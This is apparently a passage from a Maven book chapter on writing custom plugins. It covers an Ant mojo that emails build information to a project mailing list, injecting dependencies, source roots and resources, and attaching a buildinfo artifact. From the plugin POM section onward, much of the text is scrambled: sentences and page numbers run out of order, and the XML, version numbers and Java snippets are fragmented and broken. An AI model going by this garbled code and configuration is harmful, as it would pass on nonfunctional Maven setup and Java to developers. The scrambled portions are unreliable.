<buildinfo>
  <systemProperties>
    <os.name>Linux</os.name>
    <java.version>1.4</java.version>
  </systemProperties>
</buildinfo>

While the name of the OS may differ, the output of the generated build information is clear enough. Your mojo has captured the name of the operating system being used to execute the build and the version of the JVM, and both of these properties can have profound effects on binary compatibility.
5.4.2. BuildInfo Example: Notifying Other Developers with an Ant Mojo

Now that some important information has been captured, you need to share it with others in your team when the resulting project artifact is deployed. It's important to remember that in the Maven world, "deployment" is defined as injecting the project artifact into the Maven repository system, so that other team members have access to it. For now, it might be enough to send a notification e-mail to the project development mailing list.

Of course, such a task could be handled using a Java-based mojo and the JavaMail API from Sun. However, given the amount of setup and code required, it's simpler to use Ant, and the dozens of well-tested, mature tasks available for build script use (including one specifically for sending e-mails).

The Ant target

To leverage the output of the mojo from the previous example – the build information file – you can use that content as the body of the e-mail. Your new mojo will be in a file called notify.build.xml, and should look similar to the following:

<project>
  <target name="notify-target">
    <mail from="maven@localhost"
          replyto="${listAddr}"
          subject="Build Info for Deployment of ${project.name}"
          mailhost="${mailHost}"
          mailport="${mailPort}"
          messagefile="${buildinfo.outputFile}">
      <to>${listAddr}</to>
    </mail>
  </target>
</project>

If you're familiar with Ant, you'll notice that this mojo expects several project properties. Information like the to: address will have to be dynamic; therefore, it should be extracted directly from the POM for the project we're building. To ensure these project properties are in place within the Ant Project instance, simply declare mojo parameters for them.

After writing the Ant target to send the notification e-mail, you just need to write a mojo definition to wire the new target into Maven's build process. From here, it's a simple matter of specifying where the email should be sent, and how.
The mojo metadata file

Unlike the prior Java examples, metadata for an Ant mojo is stored in a separate file, which is associated to the build script using a naming convention. In this example, the build script was called notify.build.xml. The corresponding metadata file will be called notify.mojos.xml and should appear as follows:

<pluginMetadata>
  <mojos>
    <mojo>
      <call>notify-target</call>
      <goal>notify</goal>
      <phase>deploy</phase>
      <description><![CDATA[
        Email environment information from the current build to the
        development mailing list when the artifact is deployed.
      ]]></description>
      <parameters>
        <parameter>
          <name>buildinfo.outputFile</name>
          <defaultValue>
            ${project.build.directory}/${project.artifactId}-${project.version}-buildinfo.xml
          </defaultValue>
          <required>true</required>
          <readonly>false</readonly>
        </parameter>
        <parameter>
          <name>listAddr</name>
          <required>true</required>
        </parameter>
        <parameter>
          <name>project.name</name>
          <defaultValue>${project.name}</defaultValue>
At first glance, the contents of this file may appear different than the metadata used in the Java mojo. However, upon closer examination, you will see many similarities, since you now have a good concept of the types of metadata used to describe a mojo. The overall structure of this file should be familiar, but expressed in XML. As with the Java example, mojo-level metadata describes details such as phase binding and mojo name. Metadata specify a list of parameters for the mojo, each with its own information like name, default value, expression, and more, and parameter flags such as required are still present. The expression syntax used to extract information from the build state is exactly the same. In this example, all of the mojo's parameter types are java.lang.String (the default). If one of the parameters were some other object type, you'd have to add a <type> element alongside the <name> element, in order to capture the parameter's type in the specification. Finally, a more in-depth discussion of the metadata file for Ant mojos is available in Appendix A.

Also, notice that this mojo is bound to the deploy phase of the life cycle. This is an important point in the case of this mojo, because you're going to be sending e-mails to the development mailing list. Any build that runs must be deployed for it to affect other development team members, so it's pointless to spam the mailing list with notification e-mails every time a jar is created for the project. Instead, by binding the mojo to the deploy phase of the life cycle, the notification e-mails will be sent only when a new artifact becomes available in the remote repository.

As with the Java example, when this mojo is executed, Maven still must resolve and inject each of these parameters into the mojo. However, the difference here is the mechanism used for this injection. In Java, parameter injection takes place either through direct field assignment, or through JavaBeans-style setXXX() methods. In an Ant-based mojo however, parameters are injected as properties and references into the Ant Project instance. The rule for parameter injection in Ant is as follows: if the parameter's type is java.lang.String, then its value is injected as a property; otherwise, its value is injected as a project reference.

Modifying the plugin POM for Ant mojos

Since Maven 2.0 shipped without support for Ant-based mojos (support for Ant was added later in version 2.0.2), some special configuration is required to allow the maven-plugin-plugin to recognize Ant mojos. Maven allows POM-specific injection of plugin-level dependencies in order to accommodate plugins that take a framework approach to providing their functionality. The maven-plugin-plugin is a perfect example, with its use of the MojoDescriptorExtractor interface from the maven-plugin-tools-api library. This library defines a set of interfaces for parsing mojo descriptors from their native format and generating various output from those descriptors – including plugin descriptor files. The maven-plugin-plugin ships with the Java and Beanshell provider libraries which implement the above interface. This allows developers to generate descriptors for Java- or Beanshell-based mojos with no additional configuration. First of all, to develop an Ant-based mojo, you will have to add support for Ant mojo extraction to the maven-plugin-plugin.
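(As an aside, to make the property-versus-reference rule concrete: the following sketch shows how an Ant target might consume a String parameter that Maven has injected as a property. The target name and message are illustrative only; a non-String parameter would instead be looked up as a project reference by id rather than through ${} property syntax.)

<target name="show-list-address">
  <!-- listAddr is a java.lang.String parameter, so it arrives as an Ant property -->
  <echo message="Notifications will be sent to ${listAddr}"/>
</target>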
it will be quite difficult to execute an Ant-based plugin. The second new dependency is.5</version> </dependency> [.6.. 151 . the specifications of which should appear as follows: <dependencies> [.] </project> Additionally. since the plugin now contains an Ant-based mojo.apache. a dependency on the core Ant library (whose necessity should be obvious).apache.] <build> <plugins> <plugin> <artifactId>maven-plugin-plugin</artifactId> <dependencies> <dependency> <groupId>org.] </dependencies> The first of these new dependencies is the mojo API wrapper for Ant build scripts.maven</groupId> <artifactId>maven-plugin-tools-ant</artifactId> <version>2.2</version> </dependency> <dependency> <groupId>ant</groupId> <artifactId>ant</artifactId> <version>1..] <dependency> <groupId>org.0.2</version> </dependency> </dependencies> </plugin> </plugins> </build> [.. quite simply.maven</groupId> <artifactId>maven-script-ant</artifactId> <version>2... If you don't have Ant in the plugin classpath. you will need to add a dependency on the maven-plugin-tools-ant library to the maven-plugin-plugin using POM configuration as follows: <project> [.. and it is always necessary for embedding Ant scripts as mojos in the Maven build process. it requires a couple of new dependencies.0...Developing Custom Maven Plugins To accomplish this.
you should add a configuration section to the new execution section.] </plugins> </build> The existing <execution> section – the one that binds the extract mojo to the build – is not modified. 152 . Now. it behaves like any other type of mojo to Maven. Again.. and these two mojos should not execute in the same phase (as mentioned previously)..except in this case.] <plugins> <plugin> <artifactId>maven-buildinfo-plugin</artifactId> <executions> <execution> <id>extract</id> [. because non-deployed builds will have no effect on other team members. execute the following command: > mvn deploy The build process executes the steps required to build and deploy a jar . This is because an execution section can address only one phase of the build life cycle.Better Builds with Maven Binding the notify mojo to the life cycle Once the plugin descriptor is generated for the Ant mojo. which supplies the listAddr parameter value. Even its configuration is the same. Adding a life-cycle binding for the new Ant mojo in the Guinea Pig POM should appear as follows: <build> [. a new section for the notify mojo is created.] </execution> <execution> <id>notify</id> <goals> <goal>notify</goal> </goals> <configuration> <listAddr>dev@guineapig.. and send them to the Guinea Pig development mailing list in the deploy phase.... it will also extract the relevant environmental details during the package phase. notification happens in the deploy phase only.org</listAddr> </configuration> </execution> </executions> </plugin> [. In order to tell the notify mojo where to send this e-mail.codehaus. Instead.
Therefore.5. you must add a dependency on one or more Maven APIs to your project's POM.maven</groupId> <artifactId>maven-artifact-manager</artifactId> <version>2. project source code and resources. if you also need to work with artifacts – including actions like artifact resolution – you must also declare a dependency on maven-artifact-manager in your POM.1. and are not required for developing basic mojos. like this: <dependency> <groupId>org. one or more artifacts in the current build. The following sections do not build on one another. The next examples cover more advanced topics relating to mojo development. modify your POM to define a dependency on maven-artifact by adding the following: <dependency> <groupId>org. Whenever you need direct access to the current project instance. Gaining Access to Maven APIs Before proceeding.0</version> </dependency> It's important to realize that Maven's artifact APIs are slightly different from its project API. However.apache. in that the artifact-related interfaces are actually maintained in a separate artifact from the components used to work with them. including the ability to work with the current project instance. To enable access to Maven's project API.maven</groupId> <artifactId>maven-artifact</artifactId> <version>2. Advanced Mojo Development The preceding examples showed how to declare basic mojo parameters. if you only need to access information inside an artifact.apache. or any related components. However. it's important to mention that the techniques discussed in this section make use of Maven's project and artifact APIs. and artifact attachments.maven</groupId> <artifactId>maven-project</artifactId> <version>2. modify your POM to define a dependency on maven-project by adding the following: <dependency> <groupId>org. then read on! 5. if you want to know how to develop plugins that manage dependencies. the above dependency declaration is fine.Developing Custom Maven Plugins 5. and how to annotate the mojo with a name and a preferred phase binding.0</version> </dependency> 153 .5.apache.0</version> </dependency> To enable access to information in artifacts via Maven's artifact API.
this declaration has another annotation. To enable a mojo to work with the set of artifacts that comprise the project's dependencies. the mojo must tell Maven that it requires the project's dependencies be resolved (this second requirement is critical. As with all declarations. such as: -Ddependencies=[. you may be wondering. if the mojo works with a project's dependencies. Maven makes it easy to inject a project's dependencies.. In addition.. Accessing Project Dependencies Many mojos perform tasks that require access to a project's dependencies.] So. namely it disables configuration via the POM under the following section: <configuration> <dependencies>. This declaration should be familiar to you. only the following two changes are required: • First.</dependencies> </configuration> It also disables configuration via system properties. the mojo must tell Maven that it requires the project dependency set. the compile mojo in the maven-compiler-plugin must have a set of dependency paths in order to build the compilation classpath. This annotation tells Maven not to allow the user to configure this parameter directly.util. Injecting the project dependency set As described above..dependencies}" * @required * @readonly */ private java. • Second.Better Builds with Maven 5.2. since the dependency resolution process is what populates the set of artifacts that make up the project's dependencies). users could easily break their builds – particularly if the mojo in question compiled project source code. Fortunately. it must tell Maven that it requires access to that set of artifacts. this is specified via a mojo parameter definition and should use the following syntax: /** * The set of dependencies required by the project * @parameter default-value="${project. which might not be as familiar: @readonly. However. “How exactly can I configure this parameter?" The answer is that the mojos parameter value is derived from the dependencies section of the POM.5. For example.. so you configure this parameter by modifying that section directly. 154 .Set dependencies. If this parameter could be specified separately from the main dependencies section. since it defines a parameter with a default value that is required to be present before the mojo can execute. the test mojo in the maven-surefire-plugin requires the project's dependency paths so it can execute the project's unit tests with a proper classpath.
you'll know that one of its major problems is that it always resolves all project dependencies before invoking the first goal in the build (for clarity. Rather. your mojo must declare that it needs them. and if so. this is a direct result of the rigid dependency resolution design in Maven 1.0 uses the term 'mojo' as roughly equivalent to the Maven 1. it will force all of the dependencies to be resolved (test is the widest possible scope. If the project's dependencies aren't available. If you've used Maven 1. the clean process will fail – though not because the clean goal requires the project dependencies.Developing Custom Maven Plugins In this case. In other words. Maven will resolve only the dependencies that satisfy the requested scope. the @readonly annotation functions to force users to configure the POM. If a mojo doesn't need access to the dependency list. To gain access to the project's dependencies. direct configuration could result in a dependency being present for compilation. at which scope. if a mojo declares that it requires dependencies for the compile scope. Maven 2 will not resolve project dependencies until a mojo requires it. It's important to note that your mojo can require any valid dependency scope to be resolved prior to its execution.x term 'goal'). the mojo is missing one last important step. if your mojo needs to work with the project's dependencies. the build process doesn't incur the added overhead of resolving them. You can declare the requirement for the test-scoped project dependency set using the following class-level annotation: /** * @requiresDependencyResolution test [. any dependencies specific to the test scope will remain unresolved. Returning to the example. Even then.. the mojo should be ready to work with the dependency set. Requiring dependency resolution Having declared a parameter that injects the projects dependencies into the mojo.] */ Now. 155 . encapsulating all others). but being unavailable for testing.x. Therefore. However. Maven provides a mechanism that allows a mojo to specify whether it requires the project dependencies to be resolved. Failure to do so will cause an empty set to be injected into the mojo's dependencies parameter. Maven 2 addresses this problem by deferring dependency resolution until the project's dependencies are actually required. if later in the build process.x. it will have to tell Maven to resolve them.. Maven 2. rather than configuring a specific plugin only. Maven encounters another mojo that declares a requirement for test-scoped dependencies. Consider the case where a developer wants to clean the project directory using Maven 1.
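Putting the two declarations together, a minimal sketch of a mojo that requires test-scoped dependency resolution might look like the following. The mojo name, goal, and log message are illustrative only (not part of the buildinfo plugin), and imports are omitted as in the book's other listings:

/**
 * Example mojo that requires the project's test-scoped dependencies to be resolved.
 *
 * @goal list-deps
 * @requiresDependencyResolution test
 */
public class ListDependenciesMojo extends AbstractMojo
{
    /**
     * The set of dependencies required by the project.
     *
     * @parameter default-value="${project.dependencies}"
     * @required
     * @readonly
     */
    private java.util.Set dependencies;

    public void execute() throws MojoExecutionException
    {
        // By the time execute() runs, Maven has resolved the dependency set for us.
        getLog().info( "Resolved " + dependencies.size() + " dependencies." );
    }
}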
To that end. rd. Once you have access to the project dependency set. one of the dependency libraries may have a newer snapshot version available.getArtifactId() ).getClassifier() != null ) { rd.hasNext().isOptional() ). you will need to iterate through the set. which enumerates all the dependencies used in the build. The code required is as follows: if ( dependencies != null && !dependencies.setClassifier( artifact. adding the information for each individual dependency to your buildinfo object.getVersion() ). rd.addResolvedDependency( rd ). In this case.setOptional( artifact. rd. knowing the specific set of snapshots used to compile a project can lend insights into why other builds are breaking. along with their versions – including those dependencies that are resolved transitively. you'll add the dependency-set injection code discussed previously to the extract mojo in the maven-buildinfo-plugin.setArtifactId( artifact. This will result in the addition of a new section in the buildinfo file. rd. ResolvedDependency rd = new ResolvedDependency(). } } 156 . } buildInfo.setType( artifact.Better Builds with Maven BuildInfo example: logging dependency versions Turning once again to the maven-buildinfo-plugin.setScope( artifact.iterator().getClassifier() ).setResolvedVersion( artifact. you will want to log the versions of the dependencies used during the build.getType() ). This is critical when the project depends on snapshot versions of other libraries. ) { Artifact artifact = (Artifact) it. rd. if ( artifact. For example.getGroupId() ).next(). so it can log the exact set of dependencies that were used to produce the project artifact.isEmpty() ) { for ( Iterator it = dependencies.getScope() ).setGroupId( artifact. rd. it.
the extract mojo should produce the same buildinfo file. For instance. This won't add much insight for debuggers looking for changes from build to build. or new source code directories to the build.mvnbook.0-alpha-SNAPSHOT. it may be necessary to augment a project's code base with an additional source directory. If this plugin adds resources like images.] <resolvedDependency> <groupId>com.. it's important for mojos to be able to access and manipulate both the source directory list and the resource definition list for a project. Therefore.1. This is because snapshot time-stamping happens on deployment only.8.1</resolvedVersion> <optional>false</optional> <type>jar</type> <scope>test</scope> </resolvedDependency> [.guineapig</groupId> <artifactId>guinea-pig-api</artifactId> <resolvedVersion>1. it's possible that a plugin may be introduced into the build process when a profile is activated. junit. and other mojos may need to produce reports based on those same source directories. Once this new source directory is in place.. when a project is built in a JDK 1. has a static version of 3. 157 .5. and is still listed with the version 1. If you were using a snapshot version from the local repository which has not been deployed. The actual snapshot version used for this artifact in a previous build could yield tremendous insight into the reasons for a current build failure.] </resolvedDependencies> The first dependency listed here. with an additional section called resolvedDependencies that looks similar to the following: <resolvedDependencies> <resolvedDependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <resolvedVersion>3. This dependency is part of the example development effort.8.094434-1</resolvedVersion> <optional>false</optional> <type>jar</type> <scope>compile</scope> </resolvedDependency> [.4 environment. it can have dramatic effects on the resulting project artifact. 5. Accessing Project Sources and Resources In certain cases.mergere.0-20060210.Developing Custom Maven Plugins When you re-build the plugin and re-run the Guinea Pig build. but consider the next dependency: guinea-pigapi. the resolvedVersion in the output above would be 1... particularly if the newest snapshot version is different. the compile mojo will require access to it.3.0-alpha-SNAPSHOT in the POM.
as in the following example: project. However. it's a simple matter of adding a new source root to it. Chapter 3 of this book). which tells Maven that it's OK to execute this mojo in the absence of a POM. It is possible that some builds won't have a current project. The current project instance is a great example of this. Maven's concept of a project can accommodate a whole list of directories. * @parameter default-value="${project}" * @required * @readonly */ private MavenProject project. As in the prior project dependencies discussion. unless declared otherwise. It requires access to the current MavenProject instance only. which can be injected into a mojo using the following code: /** * Project instance. Once the current project instance is available to the mojo. The generally-accepted binding for this type of activity is in the generate-sources life-cycle phase.directory}/generated-sources/<plugin-prefix> While conforming with location standards like this is not required. So. This declaration identifies the project field as a required mojo parameter that will inject the current MavenProject instance into the mojo for use. Maven will fail the build if it doesn't have a current project instance and it encounters a mojo that requires one. as in the case where the mavenarchetype-plugin is used to create a stub of a new project. or simply need to augment the basic project code base. and no other project contains current state information for this build. when generating source code. This can be very useful when plugins generate source code. Mojos that augment the source-root list need to ensure that they execute ahead of the compile phase. mojos require a current project instance to be available.addCompileSourceRoot( sourceDirectoryPath ). it does improve the chances that your mojo will be compatible with other plugins bound to the same life cycle. This annotation tells Maven that users cannot modify this parameter. Further. instead. any normal build will have a current project.build. if you expect your mojo to be used in a context where there is no POM – as in the case of the archetype plugin – then simply add the class-level annotation: @requiresProject with a value of false. it refers to a part of the build state that should always be present (a more in-depth discussion of this annotation is available in section 3.Better Builds with Maven Adding a source directory to the build Although the POM supports only a single sourceDirectory entry. this parameter also adds the @readonly annotation. the accepted default location for the generated source is in: ${project. 158 .6. used to add new source directory to the build. allowing plugins to add new source directories as they execute. Maven's project API bridges this gap.
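As a sketch of the pattern just described (the goal name, directory name, and generation step are invented for illustration; imports are omitted as in the book's other listings), a source-generating mojo bound to the generate-sources phase might register its output directory like this:

/**
 * Illustrative mojo that adds a generated-sources directory to the build.
 *
 * @goal generate
 * @phase generate-sources
 */
public class GenerateSourcesMojo extends AbstractMojo
{
    /**
     * Project instance, used to add the new source directory to the build.
     *
     * @parameter default-value="${project}"
     * @required
     * @readonly
     */
    private MavenProject project;

    public void execute() throws MojoExecutionException
    {
        // Follow the accepted convention for generated source locations.
        File generatedSources = new File( project.getBuild().getDirectory(), "generated-sources/example" );
        generatedSources.mkdirs();

        // ... code generation would write .java files into this directory here ...

        // Register the directory so it is compiled along with the normal sources.
        project.addCompileSourceRoot( generatedSources.getAbsolutePath() );
    }
}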
xml files for servlet engines. the Maven application itself is well-hidden from the mojo developer.xml file found in all maven artifacts. Maven components can make it much simpler to interact with the build process. the process of adding a new resource directory to the current build is straightforward and requires access to the MavenProject and MavenProjectHelper: /** * Project instance. that it's not a parameter at all! In fact. * @component */ private MavenProjectHelper helper. used to add new source directory to the build. Normally. Many different mojo's package resources with their generated artifacts such as web. you should notice something very different about this parameter. Namely. it is a utility. or wsdl files for web services. 159 . It provides methods for attaching artifacts and adding new resource definitions to the current project. as in the case of Maven itself and the components. in some special cases. This could be a descriptor for binding the project artifact into an application framework. A complete discussion of Maven's architecture – and the components available – is beyond the scope of this chapter. this is what Maven calls a component requirement (it's a dependency on an internal component of the running Maven application). as it is particularly useful to mojo developers. used to make addition of resources * simpler. which means it's always present. the unadorned @component annotation – like the above code snippet – is adequate. the MavenProjectHelper component is worth mentioning here. the project helper is not a build state. * @parameter default-value="${project}" * @required * @readonly */ private MavenProject project. as discussed previously. the MavenProjectHelper is provided to standardize the process of augmenting the project instance. However. The project helper component can be injected as follows: /** * project-helper instance. in most cases. Right away. however. Component requirements are not available for configuration by users. so your mojo simply needs to ask for it.Developing Custom Maven Plugins Adding a resource to the build Another common practice is for a mojo to generate some sort of non-code resource. This declaration will inject the current project instance into the mojo. Whatever the purpose of the mojo. For example. To be clear. to simplify adding resources to a project. This component is part of the Maven application. Component requirements are simple to declare. the mojo also needs access to the MavenProjectHelper component. However. which will be packaged up in the same jar as the project classes. and abstract the associated complexities away from the mojo developer.
160 . the entire build will fail. The classic example is the compile mojo in the maven-compiler-plugin. as in the following example: /** * List of source roots containing non-test code. they have to modify the sourceDirectory element in the POM. and the jar mojo in the maven-source-plugin. List excludes = null. it's important to understand where resources should be added during the build life cycle. in order to perform some operation on the source code. and exclusion patterns as local variables. this parameter declaration states that Maven does not allow users to configure this parameter directly.compileSourceRoots}" * @required * @readonly */ private List sourceRoots. includes. directory. Again. The parameter is also required for this mojo to execute. The most common place for such activities is in the generate-resources life-cycle phase.addResource(project. List includes = Collections. which actually compiles the source code contained in these root directories into classes in the project output directory. In a typical case. it will need to execute ahead of this phase. others must read the list of active source directories.Better Builds with Maven With these two objects at your disposal. Other examples include javadoc mojo in the maven-javadoc-plugin. excludes). Similar to the parameter declarations from previous sections. which may or may not be directly configurable. If your mojo is meant to add resources to the eventual project artifact. adding a new resource couldn't be easier. Simply define the resources directory to add. conforming with these standards improves the compatibility of your plugin with other plugins in the build. Accessing the source-root list Just as some mojos add new source directories to the build. along with inclusion and exclusion patterns for resources within that directory. * @parameter default-value="${project. and then call a utility method on the project helper. all you have to do is declare a single parameter to inject them. these values would come from other mojo parameters. for the sake of brevity.singletonList("**/*"). The prior example instantiates the resource's directory. instead. Gaining access to the list of source root directories for a project is easy. or else bind a mojo to the life-cycle phase that will add an additional source directory to the build. Again. inclusion patterns. The code should look similar to the following: String directory = "relative/path/to/some/directory". if it's missing. helper. Resources are copied to the classes directory of the build during the process-resources phase.
as in the case of the extract mojo. You've already learned that mojos can modify the list of resources included in the project artifact. you need to add the following code: for ( Iterator it = sourceRoots. Accessing the resource list Non-code resources complete the picture of the raw materials processed by a Maven build. in order to incorporate list of source directories to the buildinfo object. for eventual debugging purposes. If a certain profile injects a supplemental source directory into the build (most likely by way of a special mojo binding).. buildInfo. which copies all non-code resources to the output directory for inclusion in the project artifact. binding this mojo to an early phase of the life cycle increases the risk of another mojo adding a new source root in a later phase. it's better to bind it to a later phase like package if capturing a complete picture of the project is important. In this case however.next(). } One thing to note about this code snippet is the makeRelative() method. now. the ${basedir} expression refers to the location of the project directory in the local file system.hasNext(). then this profile would dramatically alter the resulting project artifact when activated. binding to any phase later than compile should be acceptable. let's learn about how a mojo can access the list of resources used in a build. it. source roots are expressed as absolute file-system paths. since compile is the phase where source files are converted into classes. 161 . any reference to the path of the project directory in the local file system should be removed. it could be critically important to track the list of source directories used in a particular build. When you add this code to the extract mojo in the maven-buildinfo-plugin. ) { String sourceRoot = (String) it. However. By the time the mojo gains access to them. Returning to the buildinfo example.iterator(). To be clear. This is the mechanism used by the resources mojo in the maven-resources-plugin. applying whatever processing is necessary. Therefore.addSourceRoot( makeRelative( sourceRoot ) ). it can iterate through them. it can be bound to any phase in the life cycle. Remember. This involves subtracting ${basedir} from the source-root paths.Developing Custom Maven Plugins Now that the mojo has access to the list of project source roots. In order to make this information more generally applicable.
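The makeRelative() method referred to here is not shown in the text; a minimal sketch might look like the following, assuming the mojo also declares a basedir parameter (an assumption for this sketch – the actual field is not shown):

    /**
     * The project's base directory (assumed parameter for this sketch).
     *
     * @parameter default-value="${basedir}"
     * @required
     * @readonly
     */
    private File basedir;

    private String makeRelative( String path )
    {
        // Strip the ${basedir} prefix so the recorded path is meaningful outside this file system.
        String prefix = basedir.getAbsolutePath();

        if ( path.startsWith( prefix ) )
        {
            path = path.substring( prefix.length() );

            if ( path.startsWith( File.separator ) )
            {
                path = path.substring( 1 );
            }
        }

        return path;
    }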
it is important that the buildinfo file capture the resource root directories used in the build for future reference. the user has the option of modifying the value of the list by configuring the resources section of the POM. 162 .model.resources}" * @required * @readonly */ private List resources. along with some matching rules for the resource files it contains. it can mean the difference between an artifact that can be deployed into a server environment and an artifact that cannot.List.maven. } } As with the prior source-root example. capturing the list of resources used to produce a project artifact can yield information that is vital for debugging purposes.iterator(). you'll notice the makeRelative() method. and Maven mojos must be able to execute in a JDK 1. Therefore. containing * directory. and excludes. The parameter appears as follows: /** * List of Resource objects for the current build.isEmpty() ) { for ( Iterator it = resources. includes. since the ${basedir} path won't have meaning outside the context of the local file system. All POM paths injected into mojos are converted to their absolute form first.addResourceRoot( makeRelative( resourceRoot ) ). String resourceRoot = resource. this parameter is declared as required for mojo execution and cannot be edited by the user. if an activated profile introduces a mojo that generates some sort of supplemental framework descriptor. by trimming the ${basedir} prefix. Since the resources list is an instance of java.next(). ) { Resource resource = (Resource) it.getDirectory(). allowing direct configuration of this parameter could easily produce results that are inconsistent with other resource-consuming mojos. the resources list is easy to inject as a mojo parameter.util. mojos must be smart enough to cast list elements as org.Better Builds with Maven Much like the source-root list. It's necessary to revert resource directories to relative locations for the purposes of the buildinfo plugin. For instance. which in fact contain information about a resource root. It's a simple task to add this capability. This method converts the absolute path of the resource directory into a relative path. * @parameter default-value="${project. to avoid any ambiguity.apache. It's also important to note that this list consists of Resource objects.hasNext(). and can be accomplished through the following code snippet: if ( resources != null && !resources. it. As noted before with the dependencies parameter. Since mojos can add new resources to the build programmatically. Just like the source-root injection parameter.Resource instances. In this case. buildInfo.4 environment that doesn't support Java generics.
Usually. Attaching Artifacts for Installation and Deployment Occasionally. the key differences are summarized in the table below. Like the vast majority of activities.addTestSourceRoot() ${project.4.addCompileSourceRoot() ${project. This chapter does not discuss test-time and compile-time source roots and resources as separate topics. That section should appear as follows: <resourceRoots> <resourceRoot>src/main/resources</resourceRoot> <resourceRoot>target/generated-resources/xdoclet</resourceRoot> </resourceRoots> Once more. by using the classifier element for that dependency section within the POM. Maven treats these derivative artifacts as attachments to the main project artifact. only the parameter expressions and method names are different. The concepts are the same. Note on testing source-roots and resources All of the examples in this advanced development discussion have focused on the handling of source code and resources.Developing Custom Maven Plugins Adding this code snippet to the extract mojo in the maven-buildinfo-plugin will result in a resourceRoots section being added to the buildinfo file.addTestResource() ${project. which may be executed during the build process. It's important to note however. 163 . due to the similarities. These artifacts are typically a derivative action or side effect of the main build process. a corresponding activity can be written to work with their test-time counterparts. collecting the list of project resources has an appropriate place in the life cycle.resources} project. javadoc bundles. mojos produce new artifacts that should be distributed alongside the main project artifact in the Maven repository system. Since all project resources are collected and copied to the project output directory in the processresources phase. which sets it apart from the main project artifact in the repository. Therefore. an artifact attachment will have a classifier. that for every activity examined that relates to source-root directories or resource definitions. instead. in that they are never distributed without the project artifact being distributed. any mojo seeking to catalog the resources used in the build should execute at least as late as the process-resources phase.testResources} 5.addResource() ${project. Once an artifact attachment is deposited in the Maven repository. and even the buildinfo file produced in the examples throughout this chapter. Table 5-2: Key differences between compile-time and test-time mojo activities Activity Change This To This Add testing source root Get testing source roots Add testing resource Get testing resources project. Classic examples of attached artifacts are source archives. This ensures that any resource modifications introduced by mojos in the build process have been completed. it's worthwhile to discuss the proper place for this type of activity within the build life cycle. it can be referenced like any other artifact. this classifier must also be specified when declaring the dependency for such an artifact. which must be processed and included in the final project artifact.testSourceRoots} helper.5.compileSourceRoots} helper. like sources or javadoc.
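For example, another project that wanted to use an attached artifact – such as a sources bundle – might declare a dependency along these lines; the coordinates are placeholders, and the classifier value depends on how the attachment was produced:

<dependency>
  <groupId>com.example</groupId>
  <artifactId>some-project</artifactId>
  <version>1.0</version>
  <!-- the classifier selects the attachment rather than the main artifact -->
  <classifier>sources</classifier>
</dependency>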
produces a derivative artifact. From the prior examples. "xml". * @parameter default-value="${project}" * @required * @readonly */ private MavenProject project. which will make the process of attaching the buildinfo artifact a little easier: /** * This helper class makes adding an artifact attachment simpler.Better Builds with Maven When a mojo. or set of mojos. "buildinfo". since it provides information about how each snapshot of the project came into existence.attachArtifact( project. the meaning and requirement of project and outputFile references should be clear. an extra piece of code must be executed in order to attach that artifact to the project artifact. outputFile ). which is still missing from the maven-buildinfo-plugin example. These values represent the artifact extension and classifier. This extra step. Once you include these two fields in the extract mojo within the maven-buildinfo-plugin. For convenience you should also inject the following reference to MavenProjectHelper. Doing so guarantees that attachment will be distributed when the install or deploy phases are run. you'll need a parameter that references the current project instance as follows: /** * Project instance. * @component */ private MavenProjectHelper helper. While an e-mail describing the build environment is transient. for historical reference.5. However. See Section 5. The MavenProject instance is the object with which your plugin will register the attachment with for use in later phases of the lifecycle. respectively. Including an artifact attachment involves adding two parameters and one line of code to your mojo. and only serves to describe the latest build. 164 .2 for a discussion about MavenProjectHelper and component requirements. the distribution of the buildinfo file via Maven's repository will provide a more permanent record of the build for each snapshot in the repository. to which we want to add an attached artifact. can provide valuable information to the development team. there are also two somewhat cryptic string values being passed in: “xml” and “buildinfo”. First. the process of attaching the generated buildinfo file to the main project artifact can be accomplished by adding the following code snippet: helper.
the maven-buildinfo-plugin is ready for action. In this chapter. you've also learned how a plugin generated file can be distributed alongside the project artifact in Maven's repository system. Summary In its unadorned state.pom Now. it can attach the buildinfo file to the main project artifact so that it's distributed whenever Maven installs or deploys the project. Maven can integrate these custom tasks into the build process through its extensible plugin framework. you can test it by re-building the plugin. Whether they be code-generation. enabling you to attach custom artifacts for installation or deployment. Using the default lifecycle mapping. It can extract relevant details from a running build and generate a buildinfo file based on these details.Developing Custom Maven Plugins By specifying an extension of “xml”. the maven-buildinfo-plugin can also generate an e-mail that contains the buildinfo file contents. 5.xml guinea-pig-core-1. then running Maven to the install life-cycle phase on our test project. Finally. Now that you've added code to distribute the buildinfo file.xml extension.0-SNAPSHOT dir guinea-pig-core-1.0-SNAPSHOT-buildinfo. This serves to attach meaning beyond simply saying. in certain circumstances. Since the build process for a project is defined by the plugins – or more accurately. reporting. you've learned that it's relatively simple to create a mojo that can extract relevant parts of the build state in order to perform a custom build-process task – even to the point of altering the set of source-code directories used to build the project.jar guinea-pig-core-1. you're telling Maven that the file in the repository should be named using a. From there. there is a standardized way to inject new behavior into the build by binding new mojos at different life-cycle phases. you should see the buildinfo file appear in the local repository alongside the project jar. 165 . Finally.6. a project requires special tasks in order to build successfully. and route that message to other development team members on the project development mailing list.0-SNAPSHOT. the mojos – that are bound to the build life cycle. when the project is deployed. Working with project dependencies and resources is equally as simple. Maven represents an implementation of the 80/20 rule.0-SNAPSHOT. By specifying the “buildinfo” classifier. or verification steps. “This is an XML file”. as follows: > > > > mvn install cd C:\Documents and Settings\jdcasey\. Maven can build a basic project with little or no modification – thus covering the 80% case. However. If you build the Guinea Pig project using this modified version of the maven-buildinfo-plugin. It identifies the file as being produced by the the maven-buildinfoplugin. you're telling Maven that this artifact should be distinguished from other project artifacts by using this value in the classifier element of the dependency declaration. as opposed to another plugin in the build process which might produce another XML file with different meaning.m2\repository cd com\mergere\mvnbook\guineapig\guinea-pig-core\1.
Many plugins already exist for Maven use, only a tiny fraction of which are a part of the default lifecycle mapping. Using the plugin mechanisms described in this chapter, you can integrate almost any tool into the build process. If your project requires special handling, chances are good that you can find a plugin to address this need at the Apache Maven project, the Codehaus Mojo project, or the project web site of the tools with which your project's build must integrate. If not, developing a custom Maven plugin is an easy next step.

Mojo development can be as simple or as complex (to the point of embedding nested Maven processes within the build) as you need it to be. However, remember that whatever problem your custom-developed plugin solves, it's unlikely to be a requirement unique to your project. So, if you have the means, please consider contributing back to the Maven community by providing access to your new plugin. It is in great part due to the re-usable nature of its plugins that Maven can offer such a powerful build platform.
6. Assessing Project Health with Maven

it is an art.
 - Samuel Butler
